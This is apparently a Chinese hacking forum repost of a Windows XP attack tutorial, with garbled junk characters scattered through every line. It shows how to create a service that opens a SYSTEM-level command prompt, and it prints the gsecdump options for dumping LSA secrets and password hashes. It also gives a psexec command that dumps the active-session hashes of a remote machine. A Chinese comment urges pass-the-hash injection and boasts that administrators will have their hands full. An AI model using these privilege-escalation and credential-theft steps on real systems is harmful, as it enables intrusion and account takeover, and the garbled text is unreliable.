o get a DOS Prompt as NT system:, s8 o/ e5 u$ Q# |8 ?5 `8 y
5 }2 k1 M2 T) i1 B2 [C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact4 P$ A t! C# x7 s
[SC] CreateService SUCCESS
9 e/ }0 {: D9 L4 a8 }# Y; Y
0 R! r& A4 J/ C- V' _C:\>sc start shellcmdline
7 [: h! y# }) s h6 k" M! }& o[SC] StartService FAILED 1053:
: L9 |5 _( H9 J9 R
9 U n# f: x; y( P! y5 }The service did not respond to the start or control request in a timely fashion. q9 R: w6 p' J; n+ ]' i9 e
5 B" P) z# K% dC:\>sc delete shellcmdline
9 s: o+ w$ B l; i# D[SC] DeleteService SUCCESS
+ W; s1 A _& \5 ]3 Z- C' l" x+ a g" P% R. N, I/ c* @
------------! T9 D& `$ A- y! ?; _8 H! D
* c' l3 ]) u: z0 K6 \! ^ QThen in the new DOS window:+ k- V: U: T" W3 z9 B
% E7 j$ r$ M2 L* b
Microsoft Windows XP [Version 5.1.2600]7 B. Y- D1 ?6 Q& e& J; |/ w& P- [
(C) Copyright 1985-2001 Microsoft Corp.! n4 e* l( y5 `/ m r
9 l) u% j5 ?2 y' }4 t3 sC:\WINDOWS\system32>whoami2 g2 s4 ~" J! X
NT AUTHORITY\SYSTEM
/ y' y5 s; @& C- k" R1 [4 x/ L& y* a+ e* o4 J6 W
C:\WINDOWS\system32>gsecdump -h3 Z1 z3 D. W1 O% ~0 Q4 x& o/ l* F
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)7 b5 g; n. p0 V: b% d+ C+ p
usage: gsecdump [options]
( Q* t3 M( m2 \" J) j; \- H3 }3 z3 `, [% s
options:
+ M# U( U5 `+ k* b+ x2 C0 ~4 U-h [ --help ] show help- O: P- Y Q# u" z
-a [ --dump_all ] dump all secrets. {; b3 _/ p7 U( {; z$ d! ~' u
-l [ --dump_lsa ] dump lsa secrets
8 ?. Z# r f% S' Q' i5 A( J-w [ --dump_wireless ] dump microsoft wireless connections" c8 M& H: a* v* r o* Y3 o. }
-u [ --dump_usedhashes ] dump hashes from active logon sessions3 y' s9 {4 s- a. @0 f8 `! z" X
-s [ --dump_hashes ] dump hashes from SAM/AD4 _8 b+ s; U/ \" [/ e
' \7 J3 y/ L& }! q/ h% N
Although I like to use:
3 t2 z2 t" I5 P9 l+ p @! |1 _7 F
$ s: L3 d R+ S! H7 IPsExec v1.83 - Execute processes remotely
3 k% l8 H0 h" Q0 O. e, ^1 n/ YCopyright (C) 2001-2007 Mark Russinovich7 b! N; M' U! e" u2 o E% e; a
Sysinternals - 链接标记[url]www.sysinternals.com[/url]- b. v9 d; X& @& W( Y% h* r
3 J& f9 o8 [3 ~1 q
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT( u) a- m/ K! m# A+ n* W, n
* r. Q. y3 E% E8 o9 Nto get the hashes from active logon sessions of a remote system.
" W+ G0 @8 l: g
( V, y7 o0 V# h( fThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.% p2 b" a0 s5 a1 y
& z- N# x. d( p+ z
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.# y) M' [& E I! D0 ]
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]. H" u4 V$ m+ X3 O$ Y; S
. u+ W: A7 L3 m1 \
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。6 H# C; f, Z+ M8 r' u4 ]( k
|